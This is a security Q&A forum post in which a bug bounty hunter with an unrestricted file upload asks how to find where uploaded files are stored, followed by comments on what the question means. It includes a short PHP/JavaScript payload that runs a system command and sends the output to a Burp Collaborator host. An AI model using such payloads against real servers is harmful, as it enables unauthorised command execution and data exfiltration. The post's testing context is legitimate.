# Can you trace the path a file upload path without manually executing it?

Tags: web-application, php, javascript, file-upload

In a current bug bounty target I have found an unrestricted file upload, it just shoots whatever you give it through a multipart form, that being said I have full freedom of payloads to employ, how could I find the actual path it's going to and its new filename, I've tried uploading this php file in hopes the uploads were indexed by some sort of bot or even a human:

```
<?php
$pwd = system("pwd")
?>

<script>
var pwd = "<?php echo $pwd ?>";
document.location='xxxxxxxxxxxxxxxxx.burpcollaborator.net/'+pwd+'.jpg' ;
</script>
```

Seeing now that nothing indexes the uploads, and I have no access to the files after they've been uploaded and they're just sitting on some server out there, it brings me back to my question, what could I inject to trace down where the file is without it being opened?

Comment: Is your question how to execute a file without executing it?

Comment: @VipulNair The question is basically "I uploaded a file. Where is it now?"

Comment: @MechMK1 "what could I inject to trace down where the file is without it being opened"Doesnt this mean he is asking for code execution without actual code execution?

Comment: @VipulNair That assumes that OP knows that code execution is the only way to get this information. What I read from this question (which may or may not be correct), is that OP tried the example code, and it didn't work. Now OP is stuck, asking if there is a way to find out where files are located, if he is unable to execute the code that he uploaded without knowing the path.